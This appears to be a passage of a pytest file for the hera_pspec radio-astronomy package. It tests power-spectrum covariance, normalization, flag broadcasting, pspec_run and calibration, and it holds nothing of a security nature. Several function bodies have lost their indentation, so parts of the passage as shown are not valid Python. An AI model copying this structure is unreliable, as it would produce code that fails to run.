uvd.nsample_array[uvd.antpair2ind(24, 25, ordered=False)] = 0.0
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
uvp = ds.pspec([(24, 25)], [(37, 38)], (0, 1), [('xx', 'xx')])
assert np.all(np.isclose(uvp.integration_array[0], 0.0))
# test covariance calculation runs with small number of delays
uvd = copy.deepcopy(self.uvd)
uvd_std = copy.deepcopy(self.uvd_std)
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None],
dsets_std=[uvd_std, uvd_std], beam=self.bm)
# test covariance methods with non-zero filter_extension
uvp = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], filter_extensions=[(2,2)], symmetric_taper=False, store_cov=True, cov_model='empirical')
assert hasattr(uvp, 'cov_array_real')
key = (0, (bls1[0],bls2[0]), "xx")
# also check the output covariance is uniform along time axis when cov_model='empirical'
assert np.allclose(uvp.get_cov(key)[0], uvp.get_cov(key)[-1])
uvp = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], exact_norm=True, store_cov=True, cov_model='dsets')
assert hasattr(uvp, 'cov_array_real')
# test the results of stats_array[cov_model]
uvp_cov = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], exact_norm=True, store_cov=True, cov_model='foreground_dependent')
uvp_cov_diag = ds.pspec(bls1[:1], bls2[:1], (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
little_h=True, verbose=True, spw_ranges=[(10,20)], exact_norm=True, store_cov_diag=True, cov_model='foreground_dependent')
key = (0, (bls1[0],bls2[0]), "xx")
assert np.isclose(np.diagonal(uvp_cov.get_cov(key), axis1=1, axis2=2), (np.real(uvp_cov_diag.get_stats('foreground_dependent_diag', key)))**2).all()
# test identity_Y caching works
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(self.uvd), copy.deepcopy(self.uvd)], wgts=[None, None],
beam=self.bm)
# assert caching is used when appropriate
uvp = ds.pspec([(24, 25), (24, 25)], [(24, 25), (24, 25)], (0, 1), ('xx', 'xx'),
input_data_weight='identity', norm='I', taper='none', verbose=False,
spw_ranges=[(20, 30)])
assert len(ds._identity_Y) == len(ds._identity_G) == len(ds._identity_H)
assert len(ds._identity_Y) == 1
assert list(ds._identity_Y.keys())[0] == ((0, 24, 25, 'xx'), (1, 24, 25, 'xx'))
# assert caching is not used when inappropriate
ds.dsets[0].flag_array[ds.dsets[0].antpair2ind(37, 38, ordered=False), :, 25, :] = True
uvp = ds.pspec([(24, 25), (37, 38)], [(24, 25), (37, 38)], (0, 1), ('xx', 'xx'),
input_data_weight='identity', norm='I', taper='none', verbose=False,
spw_ranges=[(20, 30)])
assert len(ds._identity_Y) == len(ds._identity_G) == len(ds._identity_H)
assert len(ds._identity_Y) == 2
assert ((0, 24, 25, 'xx'), (1, 24, 25, 'xx')) in ds._identity_Y.keys()
assert ((0, 37, 38, 'xx'), (1, 37, 38, 'xx')) in ds._identity_Y.keys()
    def test_normalization(self):
        """
        Test that pspec() normalization matches a legacy (PAPER-style)
        FFT delay-spectrum estimate to within 3%, both without a taper and
        with a Blackman-Harris taper.
        """
        # Test Normalization of pspec() compared to PAPER legacy techniques
        d1 = self.uvd.select(times=np.unique(self.uvd.time_array)[:-1:2],
                             frequencies=np.unique(self.uvd.freq_array)[40:51], inplace=False)
        d2 = self.uvd.select(times=np.unique(self.uvd.time_array)[1::2],
                             frequencies=np.unique(self.uvd.freq_array)[40:51], inplace=False)
        freqs = np.unique(d1.freq_array)
        # Setup baselines
        bls1 = [(24, 25)]
        bls2 = [(37, 38)]
        # Get beam
        beam = copy.deepcopy(self.bm)
        cosmo = conversions.Cosmo_Conversions()
        # Set to mK scale
        d1.data_array *= beam.Jy_to_mK(freqs, pol='XX')[None, None, :, None]
        d2.data_array *= beam.Jy_to_mK(freqs, pol='XX')[None, None, :, None]
        # Compare using no taper
        OmegaP = beam.power_beam_int(pol='XX')
        OmegaPP = beam.power_beam_sq_int(pol='XX')
        OmegaP = interp1d(beam.beam_freqs/1e6, OmegaP)(freqs/1e6)
        OmegaPP = interp1d(beam.beam_freqs/1e6, OmegaPP)(freqs/1e6)
        NEB = 1.0
        Bp = np.median(np.diff(freqs)) * len(freqs)
        scalar = cosmo.X2Y(np.mean(cosmo.f2z(freqs))) * np.mean(OmegaP**2/OmegaPP) * Bp * NEB
        data1 = d1.get_data(bls1[0])
        data2 = d2.get_data(bls2[0])
        # legacy estimate: direct FFT cross-multiply with analytic scalar
        legacy = np.fft.fftshift(np.conj(np.fft.fft(data1, axis=1)) * np.fft.fft(data2, axis=1) * scalar / len(freqs)**2, axes=1)[0]
        # hera_pspec OQE
        ds = pspecdata.PSpecData(dsets=[d1, d2], wgts=[None, None], beam=beam)
        uvp = ds.pspec(bls1, bls2, (0, 1), pols=('xx','xx'), taper='none', input_data_weight='identity', norm='I', sampling=True)
        oqe = uvp.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
        # assert answers are same to within 3%
        assert np.isclose(np.real(oqe)/np.real(legacy), 1, atol=0.03, rtol=0.03).all()
        # taper: recompute noise-equivalent bandwidth for blackman-harris
        window = windows.blackmanharris(len(freqs))
        NEB = Bp / trapz(window**2, x=freqs)
        scalar = cosmo.X2Y(np.mean(cosmo.f2z(freqs))) * np.mean(OmegaP**2/OmegaPP) * Bp * NEB
        data1 = d1.get_data(bls1[0])
        data2 = d2.get_data(bls2[0])
        legacy = np.fft.fftshift(np.conj(np.fft.fft(data1*window[None, :], axis=1)) * np.fft.fft(data2*window[None, :], axis=1) * scalar / len(freqs)**2, axes=1)[0]
        # hera_pspec OQE
        ds = pspecdata.PSpecData(dsets=[d1, d2], wgts=[None, None], beam=beam)
        uvp = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), taper='blackman-harris', input_data_weight='identity', norm='I')
        oqe = uvp.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
        # assert answers are same to within 3%
        assert np.isclose(np.real(oqe)/np.real(legacy), 1, atol=0.03, rtol=0.03).all()
def test_broadcast_dset_flags(self):
    """
    Test PSpecData.broadcast_dset_flags: flags should be broadcast across
    time within each spectral window when the flagged fraction of a channel
    exceeds ``time_thresh``, and fully-flagged integrations must receive
    zero weight (and zero integration time) in the resulting power spectra.
    """
    # setup
    fname = os.path.join(DATA_PATH, "zen.all.xx.LST.1.06964.uvA")
    uvd = UVData()
    uvd.read_miriad(fname)
    Nfreq = uvd.data_array.shape[2]

    # test basic execution w/ a spw selection: inside the selected spw the
    # broadcast should have cleaned out the isolated flags
    ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
    ds.broadcast_dset_flags(spw_ranges=[(400, 800)], time_thresh=0.2)
    assert not ds.dsets[0].get_flags(24, 25)[:, 550:650].any()

    # test w/ no spw selection: flags remain in that channel range
    ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
    ds.broadcast_dset_flags(spw_ranges=None, time_thresh=0.2)
    assert ds.dsets[0].get_flags(24, 25)[:, 550:650].any()

    # test unflagging: everything should come out unflagged
    ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
    ds.broadcast_dset_flags(spw_ranges=None, time_thresh=0.2, unflag=True)
    assert not ds.dsets[0].get_flags(24, 25)[:, :].any()

    # test single integration being flagged within spw: one flagged channel
    # should broadcast across the full spw for that integration only
    ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
    ds.dsets[0].flag_array[ds.dsets[0].antpair2ind(24, 25, ordered=False)[3], 0, 600, 0] = True
    ds.broadcast_dset_flags(spw_ranges=[(400, 800)], time_thresh=0.25, unflag=False)
    assert ds.dsets[0].get_flags(24, 25)[3, 400:800].all()
    assert not ds.dsets[0].get_flags(24, 25)[3, :].all()

    # test pspec run sets flagged integration to have zero weight
    uvd.flag_array[uvd.antpair2ind(24, 25, ordered=False)[3], 0, 400, :] = True
    ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd), copy.deepcopy(uvd)], wgts=[None, None])
    ds.broadcast_dset_flags(spw_ranges=[(400, 450)], time_thresh=0.25)
    uvp = ds.pspec([(24, 25), (37, 38), (38, 39)], [(24, 25), (37, 38), (38, 39)], (0, 1), ('xx', 'xx'),
                   spw_ranges=[(400, 450)], verbose=False)
    # assert flag broadcast above hits weight arrays in uvp
    assert np.all(np.isclose(uvp.get_wgts((0, ((24, 25), (24, 25)), ('xx', 'xx')))[3], 0.0))
    # assert flag broadcast above hits integration arrays
    assert np.isclose(uvp.get_integrations((0, ((24, 25), (24, 25)), ('xx', 'xx')))[3], 0.0)

    # average spectra
    avg_uvp = uvp.average_spectra(blpair_groups=[sorted(np.unique(uvp.blpair_array))], time_avg=True, inplace=False)
    # repeat but change data in flagged portion
    ds.dsets[0].data_array[uvd.antpair2ind(24, 25, ordered=False)[3], 0, 400:450, :] *= 100
    uvp2 = ds.pspec([(24, 25), (37, 38), (38, 39)], [(24, 25), (37, 38), (38, 39)], (0, 1), ('xx', 'xx'),
                    spw_ranges=[(400, 450)], verbose=False)
    # BUGFIX: average the second (perturbed) UVPSpec, not `uvp` again --
    # averaging `uvp` twice made the comparison below trivially true and
    # the test could never catch a flag-propagation failure.
    avg_uvp2 = uvp2.average_spectra(blpair_groups=[sorted(np.unique(uvp2.blpair_array))], time_avg=True, inplace=False)
    # assert average before and after are the same!
    assert avg_uvp == avg_uvp2
def test_RFI_flag_propagation(self):
"""
Check that flagging behaves sensibly in ds.pspec():
(1) with no flags present, toggling flag broadcasting does not change the
answer, and (2) once a baseline is fully flagged, scaling its data has no
effect on the resulting power spectrum.
"""
# generate ds and weights
uvd = copy.deepcopy(self.uvd)
uvd.flag_array[:] = False
Nfreq = uvd.data_array.shape[2]
# Basic test of shape
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm)
test_R = ds.R((1, 37, 38, 'XX'))
assert test_R.shape == (Nfreq, Nfreq)
# First test that turning-off flagging does nothing if there are no flags in the data
bls1 = [(24, 25)]
bls2 = [(37, 38)]
ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], beam=self.bm, labels=['red', 'blue'])
uvp_flagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
                       little_h=True, verbose=False)
ds.broadcast_dset_flags(unflag=True)
uvp_unflagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
                         little_h=True, verbose=False)
qe_unflagged = uvp_unflagged.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
qe_flagged = uvp_flagged.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
# assert answers are same to within 0.1%
assert np.isclose(np.real(qe_unflagged)/np.real(qe_flagged), 1, atol=0.001, rtol=0.001).all()
# Test that when flagged, the data within a channel really don't have any effect on the final result
uvd2 = copy.deepcopy(uvd)
uvd2.flag_array[uvd.antpair2ind(24, 25, ordered=False)] = True
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp_flagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
                       little_h=True, verbose=False)
# scale the (fully flagged) baseline's data by a large arbitrary factor;
# the resulting spectrum must be unchanged
uvd2.data_array[uvd.antpair2ind(24, 25, ordered=False)] *= 9234.913
ds = pspecdata.PSpecData(dsets=[uvd2, uvd2], wgts=[None, None], beam=self.bm)
uvp_flagged_mod = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='identity', norm='I', taper='none',
                           little_h=True, verbose=False)
qe_flagged_mod = uvp_flagged_mod.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
qe_flagged = uvp_flagged.get_data((0, ((24, 25), (37, 38)), ('xx','xx')))[0]
# assert answers are same to within 0.1%
assert np.isclose(np.real(qe_flagged_mod), np.real(qe_flagged), atol=0.001, rtol=0.001).all()
# Test below commented out because this sort of aggressive symmetrization is not yet implemented.
# # Test that flagging a channel for one dataset (e.g. just left hand dataset x2)
# # is equivalent to flagging for both x1 and x2.
# test_wgts_flagged = copy.deepcopy(test_wgts)
# test_wgts_flagged.data_array[:,:,40:60] = 0. # Flag 20 channels
# ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[test_wgts_flagged, test_wgts_flagged], beam=self.bm)
# print "mode alpha"
# uvp_flagged = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='diagonal', norm='I', taper='none',
#                        little_h=True, verbose=False)
# ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, test_wgts_flagged], beam=self.bm)
# print "mode beta"
# uvp_flagged_asymm = ds.pspec(bls1, bls2, (0, 1), ('xx','xx'), input_data_weight='diagonal', norm='I', taper='none',
#                              little_h=True, verbose=False)
# qe_flagged_asymm = uvp_flagged_asymm .get_data(0, ((24, 25), (37, 38)), 'xx')[0]
# qe_flagged = uvp_flagged.get_data(0, ((24, 25), (37, 38)), 'xx')[0]
# #print np.real(qe_flagged_asymm)/np.real(qe_flagged)
# # assert answers are same to within 3%
# assert np.isclose(np.real(qe_flagged_asymm)/np.real(qe_flagged), 1, atol=0.03, rtol=0.03).all()
#print(uvd.data_array.shape)
def test_validate_blpairs(self):
    """Sanity checks for pspecdata.validate_blpairs."""
    uvd = copy.deepcopy(self.uvd)

    # non-UVData dataset arguments must raise TypeError
    bad_blp = [((1, 2), (2, 3))]
    pytest.raises(TypeError, pspecdata.validate_blpairs, bad_blp, None, uvd)
    pytest.raises(TypeError, pspecdata.validate_blpairs, bad_blp, uvd, None)

    # blpair lists built from real baselines should validate,
    # both ungrouped and grouped
    baselines = [(24, 25), (37, 38)]
    _, _, blpairs = utils.construct_blpairs(baselines, exclude_permutations=False,
                                            exclude_auto_bls=True)
    pspecdata.validate_blpairs(blpairs, uvd, uvd)
    _, _, blpairs = utils.construct_blpairs(baselines, exclude_permutations=False,
                                            exclude_auto_bls=True, group=True)
    pspecdata.validate_blpairs(blpairs, uvd, uvd)

    # a non-redundant pair should still pass validation without raising
    pspecdata.validate_blpairs([((24, 25), (24, 38))], uvd, uvd)
def test_pspec_run():
    """
    End-to-end tests of pspecdata.pspec_run: basic execution, Jy->mK
    conversion, blpair/pol/spw selection, dataset labeling, time
    interleaving, rephasing, flag broadcasting, LST trimming, input
    calibration, glob/file-list inputs, and error conditions.
    """
    fnames = [os.path.join(DATA_PATH, d)
              for d in ['zen.even.xx.LST.1.28828.uvOCRSA',
                        'zen.odd.xx.LST.1.28828.uvOCRSA']]
    beamfile = os.path.join(DATA_PATH, "HERA_NF_dipole_power.beamfits")
    fnames_std = [os.path.join(DATA_PATH, d)
                  for d in ['zen.even.std.xx.LST.1.28828.uvOCRSA',
                            'zen.odd.std.xx.LST.1.28828.uvOCRSA']]

    # test basic execution
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")
    ds = pspecdata.pspec_run(fnames, "./out.h5", Jy2mK=False,
                             verbose=False, overwrite=True, dset_pairs=[(0, 1)],
                             bl_len_range=(14, 15), bl_deg_range=(50, 70),
                             psname_ext='_0', spw_ranges=[(0, 25)])
    psc = container.PSpecContainer('./out.h5')
    assert isinstance(psc, container.PSpecContainer)
    assert psc.groups() == ['dset0_dset1']
    assert psc.spectra(psc.groups()[0]) == ['dset0_x_dset1_0']
    assert os.path.exists("./out.h5")

    # test Jy2mK, blpairs, cosmo, cov_array, spw_ranges, dset labeling
    cosmo = conversions.Cosmo_Conversions(Om_L=0.0)
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")
    ds = pspecdata.pspec_run(fnames, "./out.h5",
                             dsets_std=fnames_std,
                             Jy2mK=True,
                             beam=beamfile,
                             blpairs=[((37, 38), (37, 38)),
                                      ((37, 38), (52, 53))],
                             verbose=False,
                             overwrite=True,
                             pol_pairs=[('xx', 'xx'), ('xx', 'xx')],
                             dset_labels=["foo", "bar"],
                             dset_pairs=[(0, 0), (0, 1)],
                             spw_ranges=[(50, 75), (120, 140)],
                             n_dlys=[20, 20],
                             cosmo=cosmo,
                             trim_dset_lsts=False,
                             broadcast_dset_flags=False,
                             cov_model='empirical',
                             store_cov=True)
    # assert groupname is dset1_dset2
    psc = container.PSpecContainer('./out.h5')
    assert ("foo_bar" in psc.groups())
    # assert uvp names are labeled by dset_pairs
    assert (sorted(psc.spectra('foo_bar'))
            == sorted([u'foo_x_bar', u'foo_x_foo']))
    # get UVPSpec for further inspection
    uvp = psc.get_pspec("foo_bar", "foo_x_bar")
    # assert Jy2mK worked
    assert uvp.vis_units == "mK"
    # assert only blpairs that were fed are present
    assert uvp.bl_array.tolist() == [137138, 152153]
    assert uvp.polpair_array.tolist() == [1515, 1515]
    # assert weird cosmology was passed
    assert uvp.cosmo == cosmo
    # assert cov_array was calculated b/c std files were passed and store_cov
    assert hasattr(uvp, 'cov_array_real')
    # assert dset labeling propagated
    assert set(uvp.labels) == set(['bar', 'foo'])
    # assert spw_ranges and n_dlys specification worked
    np.testing.assert_array_equal(uvp.get_spw_ranges(), [(163476562.5, 165917968.75, 25, 20), (170312500.0, 172265625.0, 20, 20)])

    # test single_dset, time_interleaving, rephasing, flag broadcasting
    uvd = UVData()
    uvd.read_miriad(fnames[0])
    # interleave the data by hand, and add some flags in
    uvd.flag_array[:] = False
    uvd.flag_array[uvd.antpair2ind(37, 38, ordered=False)[0], 0, 10, 0] = True
    uvd.flag_array[uvd.antpair2ind(37, 38, ordered=False)[:3], 0, 15, 0] = True
    uvd1 = uvd.select(times=np.unique(uvd.time_array)[::2], inplace=False)
    uvd2 = uvd.select(times=np.unique(uvd.time_array)[1::2], inplace=False)
    if os.path.exists("./out2.h5"):
        os.remove("./out2.h5")
    ds = pspecdata.pspec_run([copy.deepcopy(uvd)], "./out2.h5",
                             blpairs=[((37, 38), (37, 38)), ((37, 38), (52, 53))], interleave_times=True,
                             verbose=False, overwrite=True, spw_ranges=[(0, 25)], rephase_to_dset=0,
                             broadcast_dset_flags=True, time_thresh=0.3)
    psc = container.PSpecContainer('./out2.h5')
    assert isinstance(psc, container.PSpecContainer)
    assert psc.groups() == ['dset0_dset1']
    assert psc.spectra(psc.groups()[0]) == ['dset0_x_dset1']
    assert os.path.exists("./out2.h5")
    # assert dsets are properly interleaved
    assert np.isclose((np.unique(ds.dsets[0].time_array) - np.unique(ds.dsets[1].time_array))[0],
                      -np.diff(np.unique(uvd.time_array))[0])
    # assert first integration flagged across entire spw
    assert ds.dsets[0].get_flags(37, 38)[0, 0:25].all()
    # assert first integration flagged *ONLY* across spw
    # (the before-spw slice [:0] is empty because the spw starts at chan 0)
    assert not (ds.dsets[0].get_flags(37, 38)[0, :0].any()
                or ds.dsets[0].get_flags(37, 38)[0, 25:].any())
    # assert channel 15 flagged for all ints
    assert ds.dsets[0].get_flags(37, 38)[:, 15].all()
    # assert phase errors decreased after re-phasing
    phserr_before = np.mean(np.abs(np.angle(uvd1.data_array / uvd2.data_array)))
    phserr_after = np.mean(np.abs(np.angle(ds.dsets[0].data_array / ds.dsets[1].data_array)))
    assert phserr_after < phserr_before

    # repeat feeding dsets_std and wgts
    if os.path.exists("./out2.h5"):
        os.remove("./out2.h5")
    ds = pspecdata.pspec_run([copy.deepcopy(uvd)], "./out2.h5", dsets_std=[copy.deepcopy(uvd)],
                             blpairs=[((37, 38), (37, 38)), ((37, 38), (52, 53))], interleave_times=True,
                             verbose=False, overwrite=True, spw_ranges=[(0, 25)], rephase_to_dset=0,
                             broadcast_dset_flags=True, time_thresh=0.3)
    # assert ds passes validation
    psc = container.PSpecContainer('./out2.h5')
    assert ds.dsets_std[0] is not None
    ds.validate_datasets()
    assert os.path.exists("./out2.h5")
    os.remove("./out2.h5")

    # test lst trimming
    if os.path.exists("./out2.h5"):
        os.remove("./out2.h5")
    uvd1 = copy.deepcopy(uvd)
    uvd2 = uvd.select(times=np.unique(uvd.time_array)[2:], inplace=False)
    ds = pspecdata.pspec_run([copy.deepcopy(uvd1), copy.deepcopy(uvd2)], "./out2.h5",
                             blpairs=[((37, 38), (37, 38)), ((37, 38), (52, 53))],
                             verbose=False, overwrite=True, spw_ranges=[(50, 100)],
                             trim_dset_lsts=True)
    # assert first uvd1 lst_array got trimmed by 2 integrations
    psc = container.PSpecContainer('./out2.h5')
    assert ds.dsets[0].Ntimes == 8
    assert np.isclose(np.unique(ds.dsets[0].lst_array), np.unique(uvd2.lst_array)).all()
    if os.path.exists("./out2.h5"):
        os.remove("./out2.h5")

    # test when no data is loaded in dset
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")
    ds = pspecdata.pspec_run(fnames, "./out.h5", Jy2mK=False, verbose=False, overwrite=True,
                             blpairs=[((500, 501), (600, 601))])  # blpairs that don't exist
    assert ds is None
    assert not os.path.exists("./out.h5")

    # same test but with pre-loaded UVDatas
    uvds = []
    for f in fnames:
        uvd = UVData()
        uvd.read_miriad(f)
        uvds.append(uvd)
    ds = pspecdata.pspec_run(uvds, "./out.h5", dsets_std=fnames_std, Jy2mK=False, verbose=False, overwrite=True,
                             blpairs=[((500, 501), (600, 601))])
    assert ds is None
    assert not os.path.exists("./out.h5")

    # test when data is loaded, but no blpairs match
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")
    ds = pspecdata.pspec_run(fnames, "./out.h5", Jy2mK=False, verbose=False, overwrite=True,
                             blpairs=[((37, 38), (600, 601))])
    assert isinstance(ds, pspecdata.PSpecData)
    assert not os.path.exists("./out.h5")

    # test glob-parseable input dataset
    dsets = [os.path.join(DATA_PATH, "zen.2458042.?????.xx.HH.uvXA"),
             os.path.join(DATA_PATH, "zen.2458042.?????.xx.HH.uvXA")]
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")
    ds = pspecdata.pspec_run(dsets, "./out.h5", Jy2mK=False, verbose=True, overwrite=True,
                             blpairs=[((24, 25), (37, 38))])
    psc = container.PSpecContainer('./out.h5', 'rw')
    uvp = psc.get_pspec("dset0_dset1", "dset0_x_dset1")
    assert uvp.Ntimes == 120
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")

    # test input calibration
    dfile = os.path.join(DATA_PATH, "zen.2458116.30448.HH.uvh5")
    cfile = os.path.join(DATA_PATH, "zen.2458116.30448.HH.flagged_abs.calfits")
    ds = pspecdata.pspec_run([dfile, dfile], "./out.h5", cals=cfile, dsets_std=[dfile, dfile],
                             verbose=False, overwrite=True, blpairs=[((23, 24), (24, 25))],
                             pol_pairs=[('xx', 'xx')], interleave_times=False,
                             file_type='uvh5', spw_ranges=[(100, 150)], cal_flag=True)
    psc = container.PSpecContainer('./out.h5', 'rw')
    uvp = psc.get_pspec('dset0_dset1', 'dset0_x_dset1')
    # test calibration flags were propagated to test that cal was applied
    assert ds.dsets[0].flag_array.any()
    assert ds.dsets[1].flag_array.any()
    assert ds.dsets_std[0].flag_array.any()
    assert ds.dsets_std[1].flag_array.any()
    # BUGFIX: these previously used `is not '""'` which compares string
    # *identity*, not equality (unreliable, and a SyntaxWarning on
    # CPython >= 3.8); the intent is an inequality check
    assert ds.dsets[0].extra_keywords['filename'] != '""'
    assert ds.dsets[0].extra_keywords['calibration'] != '""'
    assert 'cal: /' in uvp.history

    # test w/ conjugated blpairs
    dfile = os.path.join(DATA_PATH, "zen.2458116.30448.HH.uvh5")
    ds = pspecdata.pspec_run([dfile, dfile], "./out.h5", cals=cfile, dsets_std=[dfile, dfile],
                             verbose=False, overwrite=True, blpairs=[((24, 23), (25, 24))],
                             pol_pairs=[('xx', 'xx')], interleave_times=False,
                             file_type='uvh5', spw_ranges=[(100, 150)], cal_flag=True)
    psc = container.PSpecContainer('./out.h5', 'rw')
    uvp = psc.get_pspec('dset0_dset1', 'dset0_x_dset1')
    assert uvp.Nblpairs == 1

    # test exceptions
    pytest.raises(AssertionError, pspecdata.pspec_run, 'foo', "./out.h5")
    pytest.raises(AssertionError, pspecdata.pspec_run, fnames, "./out.h5", blpairs=(1, 2), verbose=False)
    pytest.raises(AssertionError, pspecdata.pspec_run, fnames, "./out.h5", blpairs=[1, 2], verbose=False)
    pytest.raises(AssertionError, pspecdata.pspec_run, fnames, "./out.h5", beam=1, verbose=False)

    # test execution with list of files for each dataset and list of cals
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")
    fnames = glob.glob(os.path.join(DATA_PATH, "zen.2458116.*.HH.uvh5"))
    cals = glob.glob(os.path.join(DATA_PATH, "zen.2458116.*.HH.flagged_abs.calfits"))
    ds = pspecdata.pspec_run([fnames, fnames], "./out.h5", Jy2mK=False,
                             verbose=False, overwrite=True, file_type='uvh5',
                             bl_len_range=(14, 15), bl_deg_range=(0, 1),
                             psname_ext='_0', spw_ranges=[(0, 25)], cals=[cals, cals])
    psc = container.PSpecContainer('./out.h5', 'rw')
    assert isinstance(psc, container.PSpecContainer)
    assert psc.groups() == ['dset0_dset1']
    assert psc.spectra(psc.groups()[0]) == ['dset0_x_dset1_0']
    assert os.path.exists("./out.h5")
    if os.path.exists("./out.h5"):
        os.remove("./out.h5")

    # test with cov_model that requires autos w/ fname as filepath
    fnames = glob.glob(os.path.join(DATA_PATH, "zen.even.xx.LST.1.28828.uvOCRSA"))
    pspecdata.pspec_run([fnames], "./out.h5", spw_ranges=[(50, 70)], dset_pairs=[(0, 0)],
                        verbose=False, overwrite=True, file_type='miriad', pol_pairs=[('xx', 'xx')],
                        blpairs=[((37, 38), (37, 38))], cov_model='foreground_dependent', store_cov=True)
    psc = container.PSpecContainer("out.h5", keep_open=False)
    uvp = psc.get_pspec('dset0', 'dset0_x_dset0')
    assert hasattr(uvp, 'cov_array_real')
    os.remove('out.h5')
def test_input_calibration():
"""
Test that PSpecData.add applies input calibration (UVCal) to datasets and
dsets_std, for list and dict inputs, and raises on bad cal arguments.
"""
dfiles = sorted(glob.glob(os.path.join(DATA_PATH, "zen.2458116.30*.HH.uvh5")))
cfiles = sorted(glob.glob(os.path.join(DATA_PATH, "zen.2458116.30*.HH.flagged_abs.calfits")))
# NOTE: this loop replaces the path strings in dfiles/cfiles in-place with
# loaded UVData/UVCal objects
for i, f in enumerate(zip(dfiles, cfiles)):
    uvd = UVData()
    uvd.read(f[0])
    dfiles[i] = uvd
    uvc = UVCal()
    uvc.read_calfits(f[1])
    cfiles[i] = uvc
# test add
pd = pspecdata.PSpecData()
pd.add(dfiles, None) # w/o cal
pd.add([copy.deepcopy(uv) for uv in dfiles], None, cals=cfiles, cal_flag=False) # with cal
# gain product for baseline (23, 24): uncalibrated / g should equal calibrated
g = (cfiles[0].get_gains(23, 'x') * np.conj(cfiles[0].get_gains(24, 'x'))).T
np.testing.assert_array_almost_equal(pd.dsets[0].get_data(23, 24, 'xx') / g,
                                     pd.dsets[1].get_data(23, 24, 'xx'))
# test add with dictionaries
pd.add({'one': copy.deepcopy(dfiles[0])}, {'one': None}, cals={'one':cfiles[0]}, cal_flag=False)
np.testing.assert_array_almost_equal(pd.dsets[0].get_data(23, 24, 'xx') / g,
                                     pd.dsets[2].get_data(23, 24, 'xx'))
# test dset_std calibration
pd.add([copy.deepcopy(uv) for uv in dfiles], None, dsets_std=[copy.deepcopy(uv) for uv in dfiles],
       cals=cfiles, cal_flag=False)
np.testing.assert_array_almost_equal(pd.dsets[0].get_data(23, 24, 'xx') / g,
                                     pd.dsets_std[3].get_data(23, 24, 'xx'))
# test exceptions
pd = pspecdata.PSpecData()
pytest.raises(TypeError, pd.add, {'one': copy.deepcopy(dfiles[0])}, {'one': None},
              cals='foo', cal_flag=False)
pytest.raises(AssertionError, pd.add, dfiles, [None], cals=[None, None])
pytest.raises(TypeError, pd.add, dfiles, [None], cals=['foo'])
def test_window_funcs():
"""
Test window function computation in ds.pspec()
This is complementary to test_get_MW above.
"""
# get a PSpecData
uvd = UVData()
uvd.read_miriad(os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'))
beam = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, "HERA_NF_dipole_power.beamfits"))
ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd)], beam=beam)
ds.set_spw((0, 20))
ds.set_taper('bh')
bl = (37, 38)
key = (0, bl, 'xx')
d = uvd.get_data(bl)
# empirical frequency-frequency covariance over the first 20 channels
C = np.cov(d[:, :20].T).real
iC = np.linalg.pinv(C)
# iterate over various R and M matrices and ensure
# normalization and dtype is consistent
for data_weight in ['identity', 'iC']:
    ds.set_weighting(data_weight)
    for norm in ['H^-1', 'I', 'V^-1/2']:
        for exact_norm in [True, False]:
            if exact_norm and norm != 'I':
                # exact_norm only supported for norm == 'I'
                continue
            ds.clear_cache()
            if data_weight == 'iC':
                # fill R with iC
                # NOTE: injects directly into the private _R cache; the
                # key tuple must match the cache's (dset, bl-pol, weight,
                # taper) convention
                ds._R[(0, (37, 38, 'xx'), 'iC', 'bh')] = iC
            # compute G and H
            Gv = ds.get_G(key, key, exact_norm=exact_norm, pol='xx')
            Hv = ds.get_H(key, key, exact_norm=exact_norm, pol='xx')
            Mv, Wv = ds.get_MW(Gv, Hv, mode=norm, exact_norm=exact_norm,
                               band_covar=C)
            # assert row-sum is normalized to 1
            assert np.isclose(Wv.sum(axis=1).real, 1).all()
            # assert this is a real matrix, even though imag is populated
